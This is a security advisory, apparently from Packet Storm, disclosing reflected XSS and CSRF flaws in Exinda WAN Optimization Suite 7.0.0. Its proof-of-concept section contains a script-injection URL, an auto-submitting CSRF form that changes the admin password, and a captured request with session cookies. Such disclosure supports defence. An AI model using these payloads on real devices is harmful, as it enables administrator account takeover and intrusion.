Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormWilliam CostaPACKETSTORM:128459
HistorySep 27, 2014 - 12:00 a.m.

Exinda WAN Optimization Suite 7.0.0 CSRF / XSS

2014-09-2700:00:00
William Costa
packetstormsecurity.com
21

EPSS

0.005

Percentile

76.6%

JSON
`I. VULNERABILITY  
  
-------------------------  
  
XSS Reflected vulnerabilities and CSRF in Exinda WAN Optimization Suite  
  
II. BACKGROUND  
-------------------------  
WAN Optimization Suite integrates enterprise-caliber bandwidth acceleration  
and optimization with best-in-class application network visibility and  
control in a single, easy-to-use suite - See more at:  
  
III. DESCRIPTION  
-------------------------  
Has been detected a XSS Reflected vulnerability in Exinda Wan Optimization  
"/admin/launch?script=rh&template=sys-users&tabsel=" parameter β€œtabsel” in  
version v7.0.0 (2160), that allows the execution of arbitrary HTML/script  
code to be executed in the context of the victim user's browser. This may  
allow a remote attacker to be able to forge requests that Exinda takes  
action upon.  
  
IV. PROOF OF CONCEPT  
-------------------------  
The application does not validate the parameter β€œtabsel” in "  
https://demo-nam-01.exinda.com:42818/admin/launch?script=rh&template=sys-  
users&tabsel=aaa"><script>alert("Exinda XSS")</script>  
  
POC CSRF  
<html>  
  
<body onload="CSRF.submit();">  
  
<form id="CSRF" action="https://demo-nam-  
02.exinda.com:34896/admin/launch?script=rh&template=sys-  
users&tabsel=localusers" method="post" name="CSRF"> <input name="action10"  
value="password_exinda"> </input> <input name="d_account=" value="account">  
</input> <input name="t_account" value="string"> </input>  
  
<input name="c_account" value="string"> </input> <input name="e_account"  
value="true"> </input> <input name="f_account" value="admin"> </input>  
<input name="d_password" value="password"> </input> <input  
name="c_password" value="-"> </input>  
  
<input name="m_password" value="false"> </input> <input name="e_password"  
value="true"> </input> <input name="f_password" value="123456"> </input>  
<input name="d_confirm" value="confirm"> </input> <input name="c_confirm"  
value="-"> </input>  
<input name="m_confirm" value="false"> </input> <input name="e_confirm"  
value="true"> </input>  
<input name="f_confirm" value="123456"> </input> <input name="apply"  
value="Change+Password"> </input> </form>  
  
</body>  
</html>  
  
Host=demo-nam-02.exinda.com:34896  
User-Agent=Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0)  
Gecko/20100101 Firefox/32.0  
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language=pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding=gzip,  
deflate Referer=https://10.0.1.120/exinda/csrf.php  
Cookie=resolutionconfig=today; _mkto_trk=id:316-TKO-387&token:_mch-  
exinda.com-1411601373982-94280;  
__utma=217124611.1138601206.1411601386.1411601386.1411601386.1;  
__utmb=217124611.6.9.1411601437592; __utmc=217124611;  
__utmz=217124611.1411601386.1.1.utmcsr=demo.exinda.com|utmccn=(referra  
l)|utmcmd=referral|utmcct=/launch.php; iframe=yes;  
session=IGQYEA1Jo1%2bOiMFK5%2b1joDCh60VoGvzrLqGJ%2bfF1Q1VCAAE%3d;  
SDPSession=9b1195d97d796f12d828a2acd5801718fb152e1b0e3f194ace21529571c  
41f8f; user_email=admin; first%5flogin=false; st_index=1411531200;  
et_index=1411617600; lastConfigurationPage=https%3A%2F%2Fdemo-nam-  
02.exinda.com%3A34896%2Fadmin%2Flaunch%3Fscript%3Drh%26template%3Dsys-  
users%26tabsel%3Dlocalusers  
Connection=keep-alive  
Content-Type=application/x-www-form-urlencoded  
Content-Length=300  
  
POSTDATA=action10=password_exinda&d_account%3D=account&t_account=strin  
g&c_account=string&e_account=true&f_account=admin&d_password=password&  
c_password=-  
&m_password=false&e_password=true&f_password=123456&d_confirm=confirm&c_confirm=-  
&m_confirm=false&e_confirm=true&f_confirm=123456&apply=Change%2BPasswo rd  
  
V. BUSINESS IMPACT -------------------------  
  
Vulnerability allows the execution of arbitrary HTML/script code to be  
executed in the context of the victim user's browser and change password of  
admin user without consentiment.  
  
VI. REQUIREMENTS  
-----------------------  
An Attacker needs to know the IP of the device.  
An Administrator needs an authenticated connection to the device.  
  
VII. SYSTEMS AFFECTED  
-------------------------  
Try Exinda WAN Optimization Suite v7.0.0 (2160)  
  
VIII. SOLUTION  
-------------------------  
All parameter must be validated and use of token csrf  
  
  
`

Related

zdt 1
prion 2
cvelist 2
cve 2
nvd 2
zdt
zdt
Exinda WAN Optimization Suite 7.0.0 CSRF / XSS Vulnerabilities
2014-09-28 00:00:00
prion
prion
Cross site request forgery (csrf)
2014-10-02 14:55:00
Cross site scripting
2014-10-02 14:55:00
cvelist
cvelist
CVE-2014-7158
2014-10-02 14:00:00
CVE-2014-7157
2014-10-02 14:00:00
cve
cve
CVE-2014-7158
2014-10-02 14:55:05
CVE-2014-7157
2014-10-02 14:55:05
nvd
nvd
CVE-2014-7157
2014-10-02 14:55:05
CVE-2014-7158
2014-10-02 14:55:05

EPSS

0.005

Percentile

76.6%

JSON
Related for PACKETSTORM:128459
zdt1prion2cvelist2cve2nvd2